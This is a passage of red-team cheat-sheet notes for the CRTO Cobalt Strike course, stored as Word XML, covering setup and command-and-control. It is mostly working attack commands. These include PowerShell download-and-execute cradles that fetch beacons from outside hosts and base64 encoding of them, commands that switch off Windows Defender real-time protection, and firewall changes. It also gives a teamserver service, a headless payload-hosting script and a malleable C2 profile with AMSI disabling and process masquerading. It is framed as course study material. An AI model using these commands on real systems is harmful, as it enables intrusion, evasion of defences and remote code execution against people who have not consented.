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3E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB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3E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://m4lici0u5.com/notes/crto-notes/" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Certified Red Team Operator (CRTO) - Notes</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100"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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CRTO - Red Teaming Command Cheat Sheet (Cobalt Strike)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100"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 xml:space="preserve">Course Link : </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://training.zeropointsecurity.co.uk/courses/red-team-ops</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100"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 xml:space="preserve">Original Cheatsheet Link : </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/0xn1k5/Red-Teaming/blob/main/Red Team Certifications - Notes %26 Cheat Sheets/CRTO - Notes %26 Cheat Sheet.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100"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 xml:space="preserve">Compiled By : Nikhil Raj ( Twitter: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://twitter.com/0xn1k5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Blog: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://organicsecurity.in</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100"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 xml:space="preserve">Modified By : An0nud4y ( Twitter: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://twitter.com/an0nud4y</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Blog: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://an0nud4y.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1"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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> : This cheat sheet has been compiled from multiple sources with the objective of aiding fellow pentesters and red teamers in their learning. The credit for all the tools and techniques belongs to their original authors. I have added a reference to the original source at the bottom of this document.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1"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 xml:space="preserve">These Notes/Cheatsheet are also available on Github - </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/An0nUD4Y/CRTO-Notes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1"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 xml:space="preserve">Red Teaming Notes Notion : </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://an0nud4y.notion.site/CRTO-Notes-a2a6242a4c4b4506b31f46db20155608?pvs=4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"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 xml:space="preserve">Access to my </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CRTO</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notes is restricted due to Policy. If you are enrolled in CRTO ping me on discord (an0nud4y) or </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://an0nud4y.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get my CRTO notes access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing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pict>
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">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3E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>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misc" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>MISC</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command--control" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Command &amp; Control</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setup-cs-listeners" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Setup CS Listeners</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defender-antivirus--amsi" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Defender Antivirus / AMSI</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initial-compromise" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Initial Compromise</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host-reconnaissance" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Host Reconnaissance</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host-persistence-normal--privileged" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Host Persistence</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host-privilege-escalation" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Host Privilege Escalation</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credential-theft" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Credential Theft</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domain-recon" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Domain Recon</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user-impersonation" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>User Impersonation</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lateral-movement" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Lateral Movement</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session-passing" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Session Passing</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pivoting" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Pivoting</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data-protection-api-dpapi" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Data Protection API (DPAPI)</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kerberos" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Kerberos</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active-directory-certificate-services" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Active Directory Certificate Services</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anchor="group-policy" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Group Policy</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mssql-servers" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>MSSQL Servers</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domain-dominance" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Domain Dominance</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forest--domain-trusts" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Forest &amp; Domain Trusts</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laps" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>LAPS</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anchor="applocker" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>AppLocker</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anchor="data-exfiltration" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Data Exfiltration</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB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reference" w:history="1">
        <w:r w:rsidRPr="003E3EB7">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Reference</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>
        <w:spacing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pict>
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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MISC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Run a python3 webserver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python3 -m http.server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Check outbound access to TeamServer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iwr -Uri http://nickelviper.com/a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iwr -Uri http://nickelviper.com/a -OutFile beacon.ps1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Change incoming firewall rules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Get-NetFirewallRule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Enable http inbound and outbound connection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New-NetFirewallRule -Name "HTTP-Inbound" -DisplayName "HTTP (TCP-In)" -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort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New-NetFirewallRule -Name "HTTP-Outbound" -DisplayName "HTTP (TCP-Out)" -Enabled True -Direction Outbound -Protocol TCP -Action Allow -LocalPort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Enable Specific port inbound and outbound connection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Inbound Rule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New-NetFirewallRule -Name "Allow-Port-Inbound" -DisplayName "Allow Inbound Connections to Port 12345" -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 4444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Outbound Rule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New-NetFirewallRule -Name "Allow-Port-Outbound" -DisplayName "Allow Outbound Connections to Port 12345" -Enabled True -Direction Outbound -Protocol TCP -Action Allow -RemotePort 4444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Removing a firewall rule by its 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Remove-NetFirewallRule -DisplayName "Test Rule"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Disabled Real Time Protection / Windows Defender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Set-MPPreference -DisableRealTimeMonitoring $true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Set-MPPreference -DisableIOAVProtection $true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Set-MPPreference -DisableIntrusionPreventionSystem $true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Encode the powershell payload to base64 for handling extra quotes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From Powershell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PS C:\&gt; $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'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[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))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#From Linux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echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 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Final Command to execute encoded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 -nop -enc &lt;BASE64_ENCODED_PAYLOAD&gt;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CobaltStrike AggressorScripts for Persistence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https://github.com/Peco602/cobaltstrike-aggressor-scripts/tree/main/persistence-sharpersist</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Command &amp; Control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Setting up DNS records for DNS based beacon payloads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Set below DNS Type A &amp; NS records, where IP points to TeamServer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 A  | 10.10.5.50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ns1  | A  | 10.10.5.50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pics | NS | ns1.nickelviper.com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the DNS configuration from TeamServer, it should return 0.0.0.0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dig @ns1.nickelviper.com test.pics.nickelviper.com +short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pics.nickelviper.com as DNS Host and Stager in Listener Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Start the teamserver and run as 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&gt; sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile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ip 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nano /etc/systemd/system/teamserver.service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[Unit]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Description=Cobalt Strike Team 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After=network.target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StartLimitIntervalSec=0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Type=simple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Restart=always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RestartSec=1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User=root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WorkingDirectory=/home/attacker/cobaltstrike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ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile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[Install]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WantedBy=multi-user.target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sudo systemctl daemon-reload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status teamserver.service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start teamserver.service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enable teamserver.service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Enable Hosting of Web Delivery Payloads via agscript client in headless mode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cat host_payloads.cna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Connected and ready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on ready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 Generate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$payload = artifact_payload("http", "powershell", "x64");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 Host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site_host("10.10.5.50", 80, "/a", $payload, "text/plain", "Auto Web Delivery (PowerShell)", false);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Add below command in "/etc/systemd/system/teamserver.service" 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ExecStartPost=/bin/sh -c '/usr/bin/sleep 30; /home/attacker/cobaltstrike/agscript 127.0.0.1 50050 headless Passw0rd! host_payloads.cna &amp;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Custom Malleable C2 Profile for CRTO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Custom C2 Profile for CRTO (Modified by an0nud4y)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 sample_name "Dumbledore";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 sleeptime "2000";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 jitter    "20";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 useragent "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";</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 host_stage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stage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userwx "false"; #Allocate Beacon DLL as RW/RX rather than RWX.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cleanup "true"; #Free memory associated with reflective loader after it has been loaded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obfuscate "true"; # Load Beacon into memory without its DLL headers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module_x64 "xpsservices.dll"; #Load DLL from disk, then replace its memory with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post-ex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amsi_disable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 Malleable C2 amsi_disable does not applies to Cobalt Strike Jump Command (psexec_psh , winrm and winrm64).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 Read this blog - https://offensivedefence.co.uk/posts/making-amsi-jump/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set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";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#set spawnto_x64 "%windir%\\System32\\dllhost.exe";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spawnto_x86 "%windir%\\syswow64\\dllhost.exe";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http-get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set uri "/cat.gif /image /pixel.gif /logo.gif";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client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r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
